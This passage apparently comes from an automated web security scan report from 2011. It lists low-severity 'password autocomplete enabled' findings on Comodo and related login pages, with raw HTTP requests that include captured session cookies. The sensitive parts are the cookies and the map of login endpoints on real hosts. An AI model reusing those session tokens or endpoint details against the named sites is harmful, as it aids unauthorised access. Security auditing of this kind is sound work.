Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_lv=1316328762; km_uq=; SWIFT_sessionid40=c08dif8qb3omwic279ulzlf7nqhuloi5; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%2C%22Top%20Buy%20Now%22%2C%22SSL%20Security%20(emerchant%20solutions)%22%2C%22banner%22%2C%22top%20menu%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1316362394.2; __utmb=1.17.10.1316362394; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:27:01 GMT
Server: Apache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31729

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="https://support.comodo.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" class="loginpassword" value=""></td>
...[SNIP]...

7.20. https://support.comodo.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php?_m=knowledgebase&_a=view&parentcategoryid=33 HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
Referer: https://secure.instantssl.com/products/SSLIdASignup1a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_lv=1316328762; km_uq=; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%2C%22Top%20Buy%20Now%22%2C%22SSL%20Security%20(emerchant%20solutions)%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1316362394.2; __utmb=1.3.10.1316362394; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:15:01 GMT
Server: Apache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 55422

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="https://support.comodo.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" class="loginpassword" value=""></td>
...[SNIP]...

7.21. http://www.comodo.com/login/comodo-members.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comodo.com
Path:   /login/comodo-members.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login/comodo-members.php HTTP/1.1
Host: www.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:30 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 5627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="//www.w3.org/1999/xhtml">
<head>
<script src="//cdn.optimizely.
...[SNIP]...
</h3>
<form name="loginForm" action="https://secure.comodo.com/products/!hostedLogin" method="post" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)" >
   <p>
...[SNIP]...
</p>
<input type="password" name="loginPassword" id="loginPassword" class="formlog" /> <input type="image" src="../images/log-on.jpg" name="submit" alt="Log on" title="Log on" class="formlogbut" />
...[SNIP]...

7.22. https://www.comodo.com/login/comodo-members.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.comodo.com
Path:   /login/comodo-members.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login/comodo-members.php HTTP/1.1
Host: www.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:40 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 5627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="//www.w3.org/1999/xhtml">
<head>
<script src="//cdn.optimizely.
...[SNIP]...
</h3>
<form name="loginForm" action="https://secure.comodo.com/products/!hostedLogin" method="post" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)" >
   <p>
...[SNIP]...
</p>
<input type="password" name="loginPassword" id="loginPassword" class="formlog" /> <input type="image" src="../images/log-on.jpg" name="submit" alt="Log on" title="Log on" class="formlogbut" />
...[SNIP]...

7.23. http://www.comodopartners.com/partner/evssl.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/evssl.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partner/evssl.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:18 GMT
Content-Type: text/html
Content-Length: 8506
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...
<td align="left" valign="top"><input type="password" name="loginPassword" value="" style="width:122px" ><a href="javascript: if(document.loginForm.onsubmit()){document.loginForm.submit();};secure_login_close()">
...[SNIP]...

7.24. http://www.comodopartners.com/partner/partnerdoc.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/partnerdoc.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partner/partnerdoc.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:16 GMT
Content-Type: text/html
Content-Length: 17656
Last-Modified: Tue, 01 Feb 2011 23:59:28 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...
<td align="left" valign="top"><input type="password" name="loginPassword" value="" style="width:122px" ><a href="javascript: if(document.loginForm.onsubmit()){document.loginForm.submit();};secure_login_close()">
...[SNIP]...

7.25. http://www.comodopartners.com/partner/rootkey.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/rootkey.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partner/rootkey.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:17 GMT
Content-Type: text/html
Content-Length: 9626
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ;">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...
<td align="left" valign="top"><input type="password" name="loginPassword" value="" style="width:122px" ><a href="javascript: if(document.loginForm.onsubmit()){document.loginForm.submit();};secure_login_close()">
...[SNIP]...

7.26. http://www.comodopartners.com/partner/trustlogo.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/trustlogo.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partner/trustlogo.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:17 GMT
Content-Type: text/html
Content-Length: 8498
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ;">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...
<td align="left" valign="top"><input type="password" name="loginPassword" value="" style="width:122px" ><a href="javascript: if(document.loginForm.onsubmit()){document.loginForm.submit();};secure_login_close()">
...[SNIP]...

7.27. http://www.contentverification.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/prove_it.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:40:48 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:21 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Brand
...[SNIP]...
<div id="loginb" style="top: 5px;right:5px;">
<form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onSubmit="return
submitLoginForm(this.loginName, this.loginPassword)">


Account Login <input name="loginName" id="loginName" size="10" type="text" />
<input size="10" onFocus="this.select()" name="loginPassword" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.28. http://www.contentverification.com/confidence_pak-buy.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /confidence_pak-buy.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /confidence_pak-buy.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/confidence_pak.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:00:00 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:21 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 7751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Conte
...[SNIP]...
</ul>
<form name="formN" method="GET" action="https://secure.comodo.com/products/!placeOrder" onSubmit="return valid()">
<input type="hidden" name="currency" />
...[SNIP]...
</strong>
<input type="password" name="loginPassword" value="" /></p>
...[SNIP]...

7.29. http://www.contentverification.com/logos/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /logos/index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /logos/index.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:59:04 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 26684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Spoof
...[SNIP]...
</h1>
<form name="logo" method="GET" action="https://secure.comodo.com/products/!placeOrder" onSubmit="return valid()">
<input type="hidden" name="ap" value="contentverification.com" />
...[SNIP]...
<td><input type="password" name="loginPassword" value="" /></td>
...[SNIP]...

7.30. http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-purchase.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.enterprisessl.com
Path:   /ssl-certificate-products/addsupport/ssl-purchase.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /ssl-certificate-products/addsupport/ssl-purchase.html?items=price_retail_comodoevssl_2yr&x=12&y=3 HTTP/1.1
Host: www.enterprisessl.com
Proxy-Connection: keep-alive
Referer: http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-evssl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ap=; referrerURL=http%3A//www.vengine.com/products/prove_it.html; entryURL=http%3A//www.enterprisessl.com/; __utma=1.33002135.1316365450.1316365450.1316365450.1; __utmb=1.1.10.1316365450; __utmc=1; __utmz=1.1316365450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:03:09 GMT
Content-Type: text/html
Last-Modified: Fri, 02 Sep 2011 05:12:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 89573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Digital SSL Certi
...[SNIP]...
<div class="productcontainer" >
           
       <form onSubmit="return validate( );" name="evssl" id="evssl" method="post" action="https://secure.comodo.net/products/!PlaceOrder">
               <input name="contractSignerName" type="hidden" id="contractSignerName" value="" />
...[SNIP]...
<td align="left" valign="top"><input name="loginPassword" type="password" id="loginPassword" value="" size="48" />&nbsp; </td>
...[SNIP]...
<td align="left" valign="top"><input name="verifyPassword" type="password" id="verifyPassword" value="" size="48" /></td>
...[SNIP]...

7.31. https://www.enterprisessl.com/login.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.enterprisessl.com
Path:   /login.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.html HTTP/1.1
Host: www.enterprisessl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:11:25 GMT
Content-Type: text/html
Content-Length: 6518
Last-Modified: Mon, 17 Jan 2011 23:35:17 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>EnterpriseSSL.com
...[SNIP]...
<div id="secuerlogin" style="width:780px; height:145px; background-color:#F1F1F1; margin-top:20px; ">
   <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return    submitLoginForm(this.loginName, this.loginPassword)">
       <table border="0" cellspacing="0" cellpadding="0" align="center" style="margin:auto;">
...[SNIP]...
<td align="left" valign="middle" class="secure-login">
                           <input size="10" onfocus="this.select()" name="loginPassword" id="loginPassword" type="password" />
                           <input value="US" type="hidden" />
...[SNIP]...

7.32. https://www.hackerguardian.com/login.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /login.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.html HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
Referer: http://www.hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316362675388r0.6238376419059932; __utmx=212060173.; __utmxx=212060173.; ap=; referrerURL=http%3A//www.vengine.com/products/prove_it.html; entryURL=http%3A//www.hackerguardian.com/; optimizelyBuckets=%7B%7D; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmb=212060173.5.10.1316362681; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:54:14 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3472
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.optim
...[SNIP]...
</p>
<form name="loginForm" method="post" action="https://www.hackerguardian.com/sas/j_spring_security_check" onsubmit="return check_login()" style="padding:0px;margin:0px;display:inline;">
<table border="0" cellpadding="0" cellspacing="0">
...[SNIP]...
<td align="left" valign="top"><input type="password" name="j_password" id="pass" value="" />&nbsp;&nbsp;</td>
...[SNIP]...

7.33. https://www.hackerguardian.com/sas/login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /sas/login.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sas/login.jsp?login_error=1 HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
Referer: https://www.hackerguardian.com/login.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2A3716140579B8BF0E1C67C566A441BE; optimizelyEndUserId=oeu1316362675388r0.6238376419059932; __utmx=212060173.; __utmxx=212060173.; ap=; referrerURL=http%3A//www.vengine.com/products/prove_it.html; entryURL=http%3A//www.hackerguardian.com/; optimizelyBuckets=%7B%7D; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmb=212060173.5.10.1316362681; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:54:25 GMT
Server: Apache
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 18594


<!DOCTYPE HTML>


<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>
Hacker Guardian
</title>

...[SNIP]...
<!-- [begin] body content -->

           
<form id="j_spring_security_check" name="userLoginForm" onsubmit="return true;" action="j_spring_security_check" method="post">

<table width="760" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<div id="wwctrl_j_spring_security_check_j_password" class="wwctrl">
<input type="password" name="j_password" size="22" id="j_spring_security_check_j_password" style="width: 150px;text-align:left"/></div>
...[SNIP]...

7.34. https://www.instantssl.com/login.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.instantssl.com
Path:   /login.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.html HTTP/1.1
Host: www.instantssl.com
Connection: keep-alive
Referer: http://www.instantssl.com/ssl-certificate-products/free-ssl-certificate.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral; ap=; referrerURL=http%3A//www.comodo.com/e-commerce/ssl-certificates/free-ssl-cert.php; entryURL=http%3A//www.instantssl.com/ssl-certificate-products/free-ssl-certificate.html; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:12:49 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 14114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.optimi
...[SNIP]...
<div id="loginform" style="overflow:hidden; ">
   <form name="loginForm" method="post" action="https://secure.instantssl.com/products/!hostedLogin" onSubmit="return submitLoginForm(this.loginName, this.loginPassword)" style="padding:0px;margin:0px;display:inline;">
   <p style="width:150px; float:left; font-size:12px; color:#666666; padding-right:5px;">
...[SNIP]...
<input type="hidden" name="region" />
           <input name="loginPassword" class="password" type="password" style="width:150px; height:17px;" value="" onClick="this.value='';" />
   </p>
...[SNIP]...

7.35. https://www.j2.com/jconnect/twa/page/homePage  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.j2.com
Path:   /jconnect/twa/page/homePage

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jconnect/twa/page/homePage HTTP/1.1
Host: www.j2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:00 GMT
Server: Apache
X-TWAInstance: WPA5J1
X-Powered-By: Servlet/2.5 JSP/2.1
X-TWA-Web: pb:27022
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link type="image/icon" href="/jconnect/resources/jconnect2/en2/ima
...[SNIP]...
</div><form method="POST" action="/jconnect/twa/login"><div style="width:166px;">
...[SNIP]...
<td><input class="textInput" maxlength="14" size="5" name="password" type="password"/></td>
...[SNIP]...

7.36. https://www.panopticsecurity.com/PCICS/MerController/doGetLocationManagement  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doGetLocationManagement

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /PCICS/MerController/doGetLocationManagement HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4a271271e63e8096a1c0ea2124e

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:11 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


